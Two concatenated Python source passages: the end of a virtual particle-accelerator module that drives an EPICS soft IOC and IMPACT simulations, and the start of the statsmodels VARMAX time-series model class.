self._findChannel(elem.h.name, elem.h.fields.angle, "readback"),
(elem.h.name, elem.h.fields.angle), desc="Horizontal Corrector",
egu="radian") # , drvabs=0.001)
va.append_rw(self._findChannel(elem.v.name, elem.v.fields.angle, "setpoint"),
self._findChannel(elem.v.name, elem.v.fields.angle, "readset"),
self._findChannel(elem.v.name, elem.v.fields.angle, "readback"),
(elem.v.name, elem.v.fields.angle), desc="Vertical Corrector",
egu="radian") # , drvabs=0.001)
va.append_elem(elem)
elif isinstance(elem, BendElement):
va.append_rw(self._findChannel(elem.name, elem.fields.field, "setpoint"),
self._findChannel(elem.name, elem.fields.field, "readset"),
self._findChannel(elem.name, elem.fields.field, "readback"),
(elem.name, elem.fields.field), desc="Bend Relative Field", egu="none") # , drvratio=0.10)
va.append_elem(elem)
elif isinstance(elem, QuadElement):
va.append_rw(self._findChannel(elem.name, elem.fields.gradient, "setpoint"),
self._findChannel(elem.name, elem.fields.gradient, "readset"),
self._findChannel(elem.name, elem.fields.gradient, "readback"),
(elem.name, elem.fields.gradient), desc="Quadrupole Gradient",
egu="T/m") # , drvratio=0.10)
va.append_elem(elem)
elif isinstance(elem, SextElement):
_LOGGER.warning("VirtAccelFactory: Hexapole magnet element support not implemented. Ignoring channels.")
# va.append_rw(self._findChannel(elem.name, elem.fields.field, "setpoint"),
# self._findChannel(elem.name, elem.fields.field, "readset"),
# self._findChannel(elem.name, elem.fields.field, "readback"),
# (elem.name, elem.fields.field), desc="Hexapole Field", egu="T/m^2", drvrel=0.05)
# va.append_elem(elem)
elif isinstance(elem, BPMElement):
va.append_ro(self._findChannel(elem.name, elem.fields.x, "readback"),
(elem.name, elem.fields.x), desc="Horizontal Position", egu="m")
va.append_ro(self._findChannel(elem.name, elem.fields.y, "readback"),
(elem.name, elem.fields.y), desc="Vertical Position", egu="m")
va.append_ro(self._findChannel(elem.name, elem.fields.phase, "readback"),
(elem.name, elem.fields.phase), desc="Beam Phase", egu="degree")
va.append_ro(self._findChannel(elem.name, elem.fields.energy, "readback"),
(elem.name, elem.fields.energy), desc="Beam Energy", egu="MeV")
va.append_elem(elem)
elif isinstance(elem, PMElement):
va.append_ro(self._findChannel(elem.name, elem.fields.x, "readback"),
(elem.name, elem.fields.x), desc="Horizontal Position", egu="m")
va.append_ro(self._findChannel(elem.name, elem.fields.y, "readback"),
(elem.name, elem.fields.y), desc="Vertical Position", egu="m")
va.append_ro(self._findChannel(elem.name, elem.fields.xrms, "readback"),
(elem.name, elem.fields.xrms), desc="Horizontal Size", egu="m")
va.append_ro(self._findChannel(elem.name, elem.fields.yrms, "readback"),
(elem.name, elem.fields.yrms), desc="Vertical Size", egu="m")
va.append_elem(elem)
elif isinstance(elem, (BLMElement, BLElement, BCMElement)):
# ignore these diagnostic elements for now
pass
elif isinstance(elem, (ValveElement, PortElement, StripElement)):
# ignore these elements with no relevant channels
pass
elif isinstance(elem, DriftElement):
# drift elements have no channels
pass
else:
raise RuntimeError("Unsupported element type: {}".format(type(elem).__name__))
return va
class VirtualAccelerator(object):
"""VirtualAccelerator executes and manages the
EPICS IOC process and IMPACT simulation process.
"""
def __init__(self, latfactory, settings, chanprefix, impact_exe, data_dir, work_dir=None):
if not isinstance(latfactory, LatticeFactory):
raise TypeError("VirtualAccelerator: Invalid type for LatticeFactory")
self._latfactory = latfactory
if not isinstance(settings, dict):
raise TypeError("VirtualAccelerator: Invalid type for accelerator Settings")
self._settings = settings
self._chanprefix = chanprefix
self.impact_exe = impact_exe
self.data_dir = data_dir
self.work_dir = work_dir
self._epicsdb = []
self._csetmap = OrderedDict()
self._elemmap = OrderedDict()
self._fieldmap = OrderedDict()
self._readfieldmap = OrderedDict()
self._noise = 0.001
self._started = False
self._continue = False
self._rm_work_dir = False
self._ioc_process = None
self._ioc_logfile = None
self._subscriptions = None
self._lock = cothread.Event(False)
@property
def impact_exe(self):
return self._impact_exe
@impact_exe.setter
def impact_exe(self, impact_exe):
if not isinstance(impact_exe, basestring):
raise TypeError("VirtualAccelerator: 'impact_exe' property much be type string")
self._impact_exe = impact_exe
@property
def data_dir(self):
return self._data_dir
@data_dir.setter
def data_dir(self, data_dir):
if not isinstance(data_dir, basestring):
raise TypeError("VirtualAccelerator: 'data_dir' property much be type string")
self._data_dir = data_dir
@property
def work_dir(self):
return self._work_dir
@work_dir.setter
def work_dir(self, work_dir):
if (work_dir is not None) and not isinstance(work_dir, basestring):
raise TypeError("VirtualAccelerator: 'work_dir' property much be type string or None")
self._work_dir = work_dir
def append_rw(self, cset, rset, read, field, desc="Element", egu="", prec=5, drvh=None, drvl=None, drvabs=None,
drvrel=None, drvratio=None):
"""Append a set of read/write channels to this virtual accelerator.
The algorithm to set EPICS DRVH/DRVK is as:
- if absolute limit (drvabs) is given, use absolute
- or if relative limit (drvres) is given, use relative
- or if a ratio (drvratio) is given, use ratio
- otherwise, no limit.
:param cset: pv name of set point
:param rset: pv name of read back for set point
:param read: pv name of read back
:param field: tuple with element name and field
:param desc: element description
:param egu: EPICS record engineering unit
:param prec: EPICS display precision
:param drvabs: absolute driven limit with +-abs(drvabs)
:param drvrel: relative driven limit, value +- abs(drvabs)
:param drvratio: driven ratio of setting point value * (1 +- ratio)
"""
if self.is_started():
raise RuntimeError("VirtualAccelerator: Cannot append RW channel when started")
val = self._settings[field[0]][field[1]]
if drvabs is not None:
drvh = abs(drvabs)
drvl = - abs(drvabs)
elif drvrel is not None:
drvh = val + abs(drvabs)
drvl = val - abs(drvabs)
elif drvratio is not None:
drvh = val + abs(val * drvratio)
drvl = val - abs(val * drvratio)
self._epicsdb.append(("ao", cset, OrderedDict([
("DESC", "{} Set Point".format(desc)),
("VAL", val),
("DRVH", drvh),
("DRVL", drvl),
("PREC", prec),
("EGU", egu)
])))
self._epicsdb.append(("ai", rset, OrderedDict([
("DESC", "{} Set Point Read Back".format(desc)),
("VAL", val),
("PREC", prec),
("EGU", egu)
])))
self._epicsdb.append(("ai", read, OrderedDict([
("DESC", "{} Read Back"),
("VAL", val),
("PREC", prec),
("EGU", egu)
])))
self._csetmap[cset] = (rset, read)
self._fieldmap[cset] = field
def append_ro(self, read, field, desc="Element", egu="", prec=5):
"""Append a read-only channel to this virtual accelerator.
:param read: pv name of read back
:param field: tuple with element name and field
:param desc: element description
:param egu: EPICS record engineering unit
:param prec: EPICS display precision
"""
if self.is_started():
raise RuntimeError("VirtualAccelerator: Cannot append RO channel when started")
self._epicsdb.append(("ai", read, OrderedDict([
("DESC", "{} Read Back".format(desc)),
("VAL", "0.0"),
("PREC", prec),
("EGU", egu)
])))
if field[0] not in self._readfieldmap:
self._readfieldmap[field[0]] = OrderedDict()
self._readfieldmap[field[0]][field[1]] = read
def append_elem(self, elem):
"""Append an accelerator element to this virtual accelerator.
"""
if self.is_started():
raise RuntimeError("VirtualAccelerator: Cannot append element when started")
self._elemmap[elem.name] = elem
def is_started(self):
"""Check is virtual accelerator has been started."""
return self._started
def start(self, raise_on_wait=False):
"""Start the virtual accelerator. Spawn a new cothread to handle execution.
"""
_LOGGER.debug("VirtualAccelerator: Start")
cothread.Spawn(self._starter, raise_on_wait, raise_on_wait=True).Wait()
def _starter(self, raise_on_wait):
_LOGGER.debug("VirtualAccelerator: Start (cothread)")
if self._started:
raise RuntimeError("VirtualAccelerator: Already started")
if not os.path.isdir(self.data_dir):
raise RuntimeError("VirtualAccelerator: Data directory not found: {}".format(self.data_dir))
if self.work_dir is not None and os.path.exists(self.work_dir):
raise RuntimeError("VirtualAccelerator: Working directory already exists: {}".format(self.work_dir))
self._started = True
self._continue = True
self._executer = cothread.Spawn(self._executer, raise_on_wait=raise_on_wait)
def stop(self):
"""Stop the virtual accelerator.
Spawn a new cothread to stop gracefully.
"""
_LOGGER.debug("VirtualAccelerator: Stop")
cothread.Spawn(self._stopper, raise_on_wait=True).Wait()
def _stopper(self):
_LOGGER.debug("VirtualAccelerator: Stop (cothread)")
if self._started:
_LOGGER.debug("VirtualAccelerator: Initiate shutdown")
self._continue = False
# self._executer.Wait()
def wait(self, timeout=None):
"""Wait for the virtual accelerator to stop
"""
if self._started:
self._executer.Wait(timeout)
def _executer(self):
"""Executer method wraps the call to _execute and ensure that
the proper clean up of connections and processes.
"""
_LOGGER.debug("VirtualAccelerator: Execute (cothread)")
try:
self._execute()
finally:
_LOGGER.info("VirtualAccelerator: Cleanup")
if self._subscriptions is not None:
_LOGGER.debug("VirtualAccelerator: Cleanup: close connections")
for sub in self._subscriptions:
sub.close()
self._subscriptions = None
if self._ioc_process is not None:
_LOGGER.debug("VirtualAccelerator: Cleanup: terminate IOC process")
self._ioc_process.terminate()
self._ioc_process.wait()
self._ioc_process = None
if self._ioc_logfile is not None:
_LOGGER.debug("VirtualAccelerator: Cleanup: close IOC log file")
self._ioc_logfile.close()
self._ioc_logfile = None
if self._rm_work_dir:
_LOGGER.debug("VirtualAccelerator: Cleanup: remove work directory")
shutil.rmtree(self.work_dir)
self._executer = None
self._continue = False
self._started = False
def _execute(self):
"""Execute the virtual accelerator. This includes the following:
1. Creating a temporary working directory for execution of IMPACT.
2. Setup the working directory by symlinking from the data directory.
3. Writing the EPICS DB to the working directory (va.db).
4. Starting the softIoc and channel initializing monitors.
5. Add noise to the settings for all input (CSET) channels.
6. Generate the IMPACT lattice file in working directory (test.in).
7. Execute IMPACT simulation and read the output files (fort.??).
8. Update the READ channels of all devives.
9. Update the REST channels of input devies.
10. Repeat from step #5.
"""
_LOGGER.debug("VirtualAccelerator: Execute virtual accelerator")
if self._chanprefix is None:
chanprefix = ""
else:
chanprefix = self._chanprefix
# Add channel for sample counting
sample_cnt = chanprefix + "SVR:CNT"
self._epicsdb.append(("ai", sample_cnt, OrderedDict([
("DESC", "Sample counter for scan client"),
("VAL", 0)
])))
# Add channel for VA configuration and control
channoise = chanprefix + "SVR:NOISE"
self._epicsdb.append(("ao", channoise, OrderedDict([
("DESC", "Noise level of Virtual Accelerator"),
("VAL", 0.001),
("PREC", 5)
])))
chanstat = chanprefix + "SVR:STATUS"
self._epicsdb.append(("bi", chanstat, OrderedDict([
("DESC", "Status of Virtual Accelerator"),
("VAL", 1),
("ZNAM", "ERR"),
("ONAM", "OK"),
("PINI", "1")
])))
chancharge = chanprefix + "SVR:CHARGE"
self._epicsdb.append(("ai", chancharge, OrderedDict([
("DESC", "Q/M of Virtual Accelerator"),
("VAL", 0.0),
("PREC", 5)
])))
if self.work_dir is not None:
os.makedirs(self.work_dir)
self._rm_work_dir = False
else:
self.work_dir = tempfile.mkdtemp(_TEMP_DIRECTORY_SUFFIX)
self._rm_work_dir = True
_LOGGER.info("VirtualAccelerator: Working directory: %s", self._work_dir)
# input file paths
epicsdbpath = os.path.join(self.work_dir, "va.db")
latticepath = os.path.join(self.work_dir, "test.in")
modelmappath = os.path.join(self.work_dir, "model.map")
# output file paths
fort18path = os.path.join(self.work_dir, "fort.18")
fort24path = os.path.join(self.work_dir, "fort.24")
fort25path = os.path.join(self.work_dir, "fort.25")
epicslogpath = os.path.join(self.work_dir, "softioc.log")
if os.path.isabs(self.data_dir):
abs_data_dir = self.data_dir
else:
abs_data_dir = os.path.abspath(self.data_dir)
for datafile in os.listdir(abs_data_dir):
srcpath = os.path.join(abs_data_dir, datafile)
destpath = os.path.join(self.work_dir, datafile)
if os.path.isfile(os.path.join(abs_data_dir, datafile)):
os.symlink(srcpath, destpath)
_LOGGER.debug("VirtualAccelerator: Link data file %s to %s", srcpath, destpath)
with open(epicsdbpath, "w") as outfile:
self._write_epicsdb(outfile)
self._ioc_logfile = open(epicslogpath, "w")
self._ioc_process = _Cothread_Popen(["softIoc", "-d", "va.db"], cwd=self.work_dir,
stdout=self._ioc_logfile, stderr=subprocess.STDOUT)
self._subscriptions = []
self._subscriptions.append(catools.camonitor(channoise, self._handle_noise_monitor))
self._subscriptions.extend(catools.camonitor(self._csetmap.keys(), self._handle_cset_monitor))
while self._continue:
# update the RSET channels with new settings
for cset in self._csetmap.items():
name, field = self._fieldmap[cset[0]]
catools.caput(cset[1][0], self._settings[name][field])
settings = self._copy_settings_with_noise()
self._latfactory.settings = settings
lattice = self._latfactory.build()
catools.caput(chancharge, lattice.initialCharge)
with open(latticepath, "w") as outfile:
with open(modelmappath, "w") as mapfile:
lattice.write(outfile, mapstream=mapfile)
start = time.time()
if os.path.isfile(fort18path):
os.remove(fort18path)
if os.path.isfile(fort24path):
os.remove(fort24path)
if os.path.isfile(fort25path):
os.remove(fort25path)
impact_process = _Cothread_Popen(["mpirun", "-np", str(lattice.nprocessors),
str(self.impact_exe)], cwd=self.work_dir,
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
(stdout, _, status) = impact_process.communicate()
# The virtual accelerator shutdown is likely to occur while IMPACT is executing,
# so check if virtual accelerator has been stopped before proceeding.
if not self._continue:
break
_LOGGER.info("VirtualAccelerator: IMPACT execution time: %f s", time.time() - start)
if status == 0:
catools.caput(chanstat, _VA_STATUS_GOOD)
else:
_LOGGER.warning("VirtualAccelerator: IMPACT exited with non-zero status code: %s\r\n%s", status, stdout)
catools.caput(chanstat, _VA_STATUS_BAD)
if os.path.isfile(fort18path):
fort18 = numpy.loadtxt(fort18path, usecols=(0, 1, 3))
fort18length = fort18.shape[0]
else:
_LOGGER.warning("VirtualAccelerator: IMPACT output not found: %s", fort18path)
catools.caput(chanstat, _VA_STATUS_BAD)
fort18length = 0
if os.path.isfile(fort24path):
fort24 = numpy.loadtxt(fort24path, usecols=(1, 2))
fort24length = fort24.shape[0]
else:
_LOGGER.warning("VirtualAccelerator: IMPACT output not found: %s", fort24path)
catools.caput(chanstat, _VA_STATUS_BAD)
fort24length = 0
if os.path.isfile(fort25path):
fort25 = numpy.loadtxt(fort25path, usecols=(1, 2))
fort25length = fort25.shape[0]
else:
_LOGGER.warning("VirtualAccelerator: IMPACT output not found: %s", fort25path)
catools.caput(chanstat, _VA_STATUS_BAD)
fort25length = 0
output_map = []
for elem in lattice.elements:
if elem.itype in [-28]:
output_map.append(elem.name)
output_length = len(output_map)
if fort18length < output_length:
_LOGGER.warning("VirtualAccelerator: IMPACT fort.18 length %s, expecting %s",
fort18length, output_length)
catools.caput(chanstat, _VA_STATUS_BAD)
if fort24length < output_length:
_LOGGER.warning("VirtualAccelerator: IMPACT fort.24 length %s, expecting %s",
fort24length, output_length)
catools.caput(chanstat, _VA_STATUS_BAD)
if fort25length < output_length:
_LOGGER.warning("VirtualAccelerator: IMPACT fort.25 length %s, expecting %s",
fort25length, output_length)
catools.caput(chanstat, _VA_STATUS_BAD)
def get_phase(idx):
# IMPACT computes the phase in radians,
# need to convert to degrees for PV.
return _normalize_phase(2.0 * fort18[idx, 1] * (180.0 / math.pi))
for idx in xrange(min(fort18length, fort24length, fort25length)):
elem = self._elemmap[output_map[idx]]
if isinstance(elem, BPMElement):
_LOGGER.debug("VirtualAccelerator: Update read: %s to %s",
self._readfieldmap[elem.name][elem.fields.x], fort24[idx, 0])
catools.caput(self._readfieldmap[elem.name][elem.fields.x], fort24[idx, 0])
_LOGGER.debug("VirtualAccelerator: Update read: %s to %s",
self._readfieldmap[elem.name][elem.fields.y], fort25[idx, 0])
catools.caput(self._readfieldmap[elem.name][elem.fields.y], fort25[idx, 0])
_LOGGER.debug("VirtualAccelerator: Update read: %s to %s",
self._readfieldmap[elem.name][elem.fields.phase], get_phase(idx))
catools.caput(self._readfieldmap[elem.name][elem.fields.phase], get_phase(idx))
_LOGGER.debug("VirtualAccelerator: Update read: %s to %s",
self._readfieldmap[elem.name][elem.fields.energy], fort18[idx, 2])
catools.caput(self._readfieldmap[elem.name][elem.fields.energy], fort18[idx, 2])
elif isinstance(elem, PMElement):
_LOGGER.debug("VirtualAccelerator: Update read: %s to %s",
self._readfieldmap[elem.name][elem.fields.x], fort24[idx, 0])
catools.caput(self._readfieldmap[elem.name][elem.fields.x], fort24[idx, 0])
_LOGGER.debug("VirtualAccelerator: Update read: %s to %s",
self._readfieldmap[elem.name][elem.fields.y], fort25[idx, 0])
catools.caput(self._readfieldmap[elem.name][elem.fields.y], fort25[idx, 0])
_LOGGER.debug("VirtualAccelerator: Update read: %s to %s",
self._readfieldmap[elem.name][elem.fields.xrms], fort24[idx, 1])
catools.caput(self._readfieldmap[elem.name][elem.fields.xrms], fort24[idx, 1])
_LOGGER.debug("VirtualAccelerator: Update read: %s to %s",
self._readfieldmap[elem.name][elem.fields.yrms], fort25[idx, 1])
catools.caput(self._readfieldmap[elem.name][elem.fields.yrms], fort25[idx, 1])
else:
_LOGGER.warning("VirtualAccelerator: Output from element type not supported: %s",
type(elem).__name__)
# Write the default error value to the remaing output PVs.
for idx in xrange(min(fort18length, fort24length, fort25length), output_length):
elem = self._elemmap[output_map[idx]]
if isinstance(elem, BPMElement):
_LOGGER.debug("VirtualAccelerator: Update read: %s to %s",
self._readfieldmap[elem.name][elem.fields.x], _DEFAULT_ERROR_VALUE)
catools.caput(self._readfieldmap[elem.name][elem.fields.x], _DEFAULT_ERROR_VALUE)
_LOGGER.debug("VirtualAccelerator: Update read: %s to %s",
self._readfieldmap[elem.name][elem.fields.y], _DEFAULT_ERROR_VALUE)
catools.caput(self._readfieldmap[elem.name][elem.fields.y], _DEFAULT_ERROR_VALUE)
_LOGGER.debug("VirtualAccelerator: Update read: %s to %s",
self._readfieldmap[elem.name][elem.fields.phase], _DEFAULT_ERROR_VALUE)
catools.caput(self._readfieldmap[elem.name][elem.fields.phase], _DEFAULT_ERROR_VALUE)
_LOGGER.debug("VirtualAccelerator: Update read: %s to %s",
self._readfieldmap[elem.name][elem.fields.energy], _DEFAULT_ERROR_VALUE)
catools.caput(self._readfieldmap[elem.name][elem.fields.energy], _DEFAULT_ERROR_VALUE)
elif isinstance(elem, PMElement):
_LOGGER.debug("VirtualAccelerator: Update read: %s to %s",
self._readfieldmap[elem.name][elem.fields.x], _DEFAULT_ERROR_VALUE)
catools.caput(self._readfieldmap[elem.name][elem.fields.x], _DEFAULT_ERROR_VALUE)
_LOGGER.debug("VirtualAccelerator: Update read: %s to %s",
self._readfieldmap[elem.name][elem.fields.y], _DEFAULT_ERROR_VALUE)
catools.caput(self._readfieldmap[elem.name][elem.fields.y], _DEFAULT_ERROR_VALUE)
_LOGGER.debug("VirtualAccelerator: Update read: %s to %s",
self._readfieldmap[elem.name][elem.fields.xrms], _DEFAULT_ERROR_VALUE)
catools.caput(self._readfieldmap[elem.name][elem.fields.xrms], _DEFAULT_ERROR_VALUE)
_LOGGER.debug("VirtualAccelerator: Update read: %s to %s",
self._readfieldmap[elem.name][elem.fields.yrms], _DEFAULT_ERROR_VALUE)
catools.caput(self._readfieldmap[elem.name][elem.fields.yrms], _DEFAULT_ERROR_VALUE)
else:
_LOGGER.warning("VirtualAccelerator: Output from element type not supported: %s",
type(elem).__name__)
# Allow the BPM, PM, etc. readbacks to update
# before the device setting readbacks PVs.
cothread.Yield()
for name, value in self._csetmap.items():
name, field = self._fieldmap[name]
_LOGGER.debug("VirtualAccelerator: Update read: %s to %s", value[1], settings[name][field])
catools.caput(value[1], settings[name][field])
# Sleep for a fraction (10%) of the total execution time
# when one simulation costs more than 0.50 seconds.
# Otherwise, sleep for the rest of 1 second.
# If a scan is being done on this virtual accelerator,
# then the scan server has a period of time to update
# setpoints before the next run of IMPACT.
if (time.time() - start) > 0.50:
cothread.Sleep((time.time() - start) * 0.1)
else:
cothread.Sleep(1.0 - (time.time() - start))
def _handle_cset_monitor(self, value, idx):
"""Handle updates of CSET channels by updating
the corresponding setting and RSET channel.
"""
cset = self._csetmap.items()[idx]
_LOGGER.debug("VirtualAccelerator: Update cset: '%s' to %s", cset[0], value)
name, field = self._fieldmap[cset[0]]
self._settings[name][field] = float(value)
def _handle_noise_monitor(self, value):
"""Handle updates of the NOISE channel.
"""
_LOGGER.debug("VirtualAccelerator: Update noise: %s", value)
self._noise = float(value)
def _copy_settings_with_noise(self):
s = deepcopy(self._settings)
for name, field in self._fieldmap.values():
s[name][field] = s[name][field] + s[name][field] * self._noise * 2.0 * (random.random() - 0.5)
return s
def _write_epicsdb(self, buf):
for record in self._epicsdb:
buf.write("record({}, \"{}\") {{\r\n".format(record[0], record[1]))
for name, value in record[2].items():
if value is None:
pass # ignore fields with value None
elif isinstance(value, int):
buf.write(" field(\"{}\", {})\r\n".format(name, value))
elif isinstance(value, float):
buf.write(" field(\"{}\", {})\r\n".format(name, value))
else:
buf.write(" field(\"{}\", \"{}\")\r\n".format(name, value))
buf.write("}\r\n\r\n")
def _normalize_phase(phase):
while phase >= 360.0:
phase -= 360.0
while phase < 0.0:
phase += 360.0
return phase
class _Cothread_Popen(object):
"""A helpful wrapper class that integrates the python
standard popen() method with the Cothread library.
"""
def __init__(self, *args, **kwargs):
self._process = subprocess.Popen(*args, **kwargs)
self._output = None
self._event = None
def communicate(self, input=None): # @ReservedAssignment
"""Start a real OS thread to wait for process communication.
"""
if self._event is None:
self._event = cothread.Event()
threading.Thread(target=self._communicate_thread, args=(input,)).start()
elif input is not None:
raise RuntimeError("_Cothread_Popen: Communicate method already called")
self._event.Wait()
return (self._output[0], self._output[1], self._process.poll())
def _communicate_thread(self, input): # @ReservedAssignment
"""Executes in separate OS thread. Wait for communication
then return the output to the cothread context.
"""
output = self._process.communicate(input)
cothread.Callback(self._communicate_callback, output)
def _communicate_callback(self, output):
"""Record the output and then signal other cothreads.
"""
self._output = output
self._event.Signal()
def wait(self):
"""Wait for the process to complete and result the exit code.
"""
self.communicate()
return self._process.poll()
def terminate(self):
"""Send the terminate signal. See subprocess.Popen.terminate()
"""
self._process.terminate()
def kill(self):
"""Send the kill signal. See subprocess.Popen.kill()
"""
self._process.kill()
| |
"""
Vector Autoregressive Moving Average with eXogenous regressors model
Author: Chad Fulton
License: Simplified-BSD
"""
from __future__ import division, absolute_import, print_function
from warnings import warn
from statsmodels.compat.collections import OrderedDict
import pandas as pd
import numpy as np
from .kalman_filter import (
KalmanFilter, FilterResults, INVERT_UNIVARIATE, SOLVE_LU
)
from .mlemodel import MLEModel, MLEResults, MLEResultsWrapper
from .tools import (
companion_matrix, diff, is_invertible,
constrain_stationary_multivariate, unconstrain_stationary_multivariate
)
from statsmodels.tools.tools import Bunch
from statsmodels.tools.data import _is_using_pandas
from statsmodels.tsa.vector_ar import var_model
import statsmodels.base.wrapper as wrap
from statsmodels.tools.sm_exceptions import (EstimationWarning,
ValueWarning)
class VARMAX(MLEModel):
r"""
Vector Autoregressive Moving Average with eXogenous regressors model
Parameters
----------
endog : array_like
The observed time-series process :math:`y`, , shaped nobs x k_endog.
exog : array_like, optional
Array of exogenous regressors, shaped nobs x k.
order : iterable
The (p,q) order of the model for the number of AR and MA parameters to
use.
trend : {'nc', 'c'}, optional
Parameter controlling the deterministic trend polynomial.
Can be specified as a string where 'c' indicates a constant intercept
and 'nc' indicates no intercept term.
error_cov_type : {'diagonal', 'unstructured'}, optional
The structure of the covariance matrix of the error term, where
"unstructured" puts no restrictions on the matrix and "diagonal"
requires it to be a diagonal matrix (uncorrelated errors). Default is
"unstructured".
measurement_error : boolean, optional
Whether or not to assume the endogenous observations `endog` were
measured with error. Default is False.
enforce_stationarity : boolean, optional
Whether or not to transform the AR parameters to enforce stationarity
in the autoregressive component of the model. Default is True.
enforce_invertibility : boolean, optional
Whether or not to transform the MA parameters to enforce invertibility
in the moving average component of the model. Default is True.
**kwargs
Keyword arguments may be used to provide default values for state space
matrices or for Kalman filtering options. See `Representation`, and
`KalmanFilter` for more details.
Attributes
----------
order : iterable
The (p,q) order of the model for the number of AR and MA parameters to
use.
trend : {'nc', 'c'}, optional
Parameter controlling the deterministic trend polynomial.
Can be specified as a string where 'c' indicates a constant intercept
and 'nc' indicates no intercept term.
error_cov_type : {'diagonal', 'unstructured'}, optional
The structure of the covariance matrix of the error term, where
"unstructured" puts no restrictions on the matrix and "diagonal"
requires it to be a diagonal matrix (uncorrelated errors). Default is
"unstructured".
measurement_error : boolean, optional
Whether or not to assume the endogenous observations `endog` were
measured with error. Default is False.
enforce_stationarity : boolean, optional
Whether or not to transform the AR parameters to enforce stationarity
in the autoregressive component of the model. Default is True.
enforce_invertibility : boolean, optional
Whether or not to transform the MA parameters to enforce invertibility
in the moving average component of the model. Default is True.
Notes
-----
Generically, the VARMAX model is specified (see for example chapter 18 of
[1]_):
.. math::
y_t = \nu + A_1 y_{t-1} + \dots + A_p y_{t-p} + B x_t + \epsilon_t +
M_1 \epsilon_{t-1} + \dots M_q \epsilon_{t-q}
where :math:`\epsilon_t \sim N(0, \Omega)`, and where :math:`y_t` is a
`k_endog x 1` vector. Additionally, this model allows considering the case
where the variables are measured with error.
Note that in the full VARMA(p,q) case there is a fundamental identification
problem in that the coefficient matrices :math:`\{A_i, M_j\}` are not
generally unique, meaning that for a given time series process there may
be multiple sets of matrices that equivalently represent it. See Chapter 12
of [1]_ for more informationl. Although this class can be used to estimate
VARMA(p,q) models, a warning is issued to remind users that no steps have
been taken to ensure identification in this case.
References
----------
.. [1] Lutkepohl, Helmut. 2007.
New Introduction to Multiple Time Series Analysis.
Berlin: Springer.
"""
def __init__(self, endog, exog=None, order=(1, 0), trend='c',
error_cov_type='unstructured', measurement_error=False,
enforce_stationarity=True, enforce_invertibility=True,
**kwargs):
# Model parameters
self.error_cov_type = error_cov_type
self.measurement_error = measurement_error
self.enforce_stationarity = enforce_stationarity
self.enforce_invertibility = enforce_invertibility
# Save the given orders
self.order = order
self.trend = trend
# Model orders
self.k_ar = int(order[0])
self.k_ma = int(order[1])
self.k_trend = int(self.trend == 'c')
# Check for valid model
if trend not in ['c', 'nc']:
raise ValueError('Invalid trend specification.')
if error_cov_type not in ['diagonal', 'unstructured']:
raise ValueError('Invalid error covariance matrix type'
' specification.')
if self.k_ar == 0 and self.k_ma == 0:
raise ValueError('Invalid VARMAX(p,q) specification; at least one'
' p,q must be greater than zero.')
# Warn for VARMA model
if self.k_ar > 0 and self.k_ma > 0:
warn('Estimation of VARMA(p,q) models is not generically robust,'
' due especially to identification issues.',
EstimationWarning)
# Exogenous data
self.k_exog = 0
if exog is not None:
exog_is_using_pandas = _is_using_pandas(exog, None)
if not exog_is_using_pandas:
exog = np.asarray(exog)
# Make sure we have 2-dimensional array
if exog.ndim == 1:
if not exog_is_using_pandas:
exog = exog[:, None]
else:
exog = pd.DataFrame(exog)
self.k_exog = exog.shape[1]
# Note: at some point in the future might add state regression, as in
# SARIMAX.
self.mle_regression = self.k_exog > 0
# We need to have an array or pandas at this point
if not _is_using_pandas(endog, None):
endog = np.asanyarray(endog)
# Model order
# Used internally in various places
_min_k_ar = max(self.k_ar, 1)
self._k_order = _min_k_ar + self.k_ma
# Number of states
k_endog = endog.shape[1]
k_posdef = k_endog
k_states = k_endog * self._k_order
# By default, initialize as stationary
kwargs.setdefault('initialization', 'stationary')
# By default, use LU decomposition
kwargs.setdefault('inversion_method', INVERT_UNIVARIATE | SOLVE_LU)
# Initialize the state space model
super(VARMAX, self).__init__(
endog, exog=exog, k_states=k_states, k_posdef=k_posdef, **kwargs
)
# Initialize the parameters
self.parameters = OrderedDict()
self.parameters['trend'] = self.k_endog * self.k_trend
self.parameters['ar'] = self.k_endog**2 * self.k_ar
self.parameters['ma'] = self.k_endog**2 * self.k_ma
self.parameters['regression'] = self.k_endog * self.k_exog
if self.error_cov_type == 'diagonal':
self.parameters['state_cov'] = self.k_endog
# These parameters fill in a lower-triangular matrix which is then
# dotted with itself to get a positive definite matrix.
elif self.error_cov_type == 'unstructured':
self.parameters['state_cov'] = (
int(self.k_endog * (self.k_endog + 1) / 2)
)
self.parameters['obs_cov'] = self.k_endog * self.measurement_error
self.k_params = sum(self.parameters.values())
# Initialize known elements of the state space matrices
# If we have exog effects, then the state intercept needs to be
# time-varying
if self.k_exog > 0:
self.ssm['state_intercept'] = np.zeros((self.k_states, self.nobs))
# The design matrix is just an identity for the first k_endog states
idx = np.diag_indices(self.k_endog)
self.ssm[('design',) + idx] = 1
# The transition matrix is described in four blocks, where the upper
# left block is in companion form with the autoregressive coefficient
# matrices (so it is shaped k_endog * k_ar x k_endog * k_ar) ...
if self.k_ar > 0:
idx = np.diag_indices((self.k_ar - 1) * self.k_endog)
idx = idx[0] + self.k_endog, idx[1]
self.ssm[('transition',) + idx] = 1
# ... and the lower right block is in companion form with zeros as the
# coefficient matrices (it is shaped k_endog * k_ma x k_endog * k_ma).
idx = np.diag_indices((self.k_ma - 1) * self.k_endog)
idx = (idx[0] + (_min_k_ar + 1) * self.k_endog,
idx[1] + _min_k_ar * self.k_endog)
self.ssm[('transition',) + idx] = 1
# The selection matrix is described in two blocks, where the upper
# block selects the all k_posdef errors in the first k_endog rows
# (the upper block is shaped k_endog * k_ar x k) and the lower block
# also selects all k_posdef errors in the first k_endog rows (the lower
# block is shaped k_endog * k_ma x k).
idx = np.diag_indices(self.k_endog)
self.ssm[('selection',) + idx] = 1
idx = idx[0] + _min_k_ar * self.k_endog, idx[1]
if self.k_ma > 0:
self.ssm[('selection',) + idx] = 1
# Cache some indices
if self.trend == 'c' and self.k_exog == 0:
self._idx_state_intercept = np.s_['state_intercept', :k_endog]
elif self.k_exog > 0:
self._idx_state_intercept = np.s_['state_intercept', :k_endog, :]
if self.k_ar > 0:
self._idx_transition = np.s_['transition', :k_endog, :]
else:
self._idx_transition = np.s_['transition', :k_endog, k_endog:]
if self.error_cov_type == 'diagonal':
self._idx_state_cov = (
('state_cov',) + np.diag_indices(self.k_endog))
elif self.error_cov_type == 'unstructured':
self._idx_lower_state_cov = np.tril_indices(self.k_endog)
if self.measurement_error:
self._idx_obs_cov = ('obs_cov',) + np.diag_indices(self.k_endog)
# Cache some slices
def _slice(key, offset):
length = self.parameters[key]
param_slice = np.s_[offset:offset + length]
offset += length
return param_slice, offset
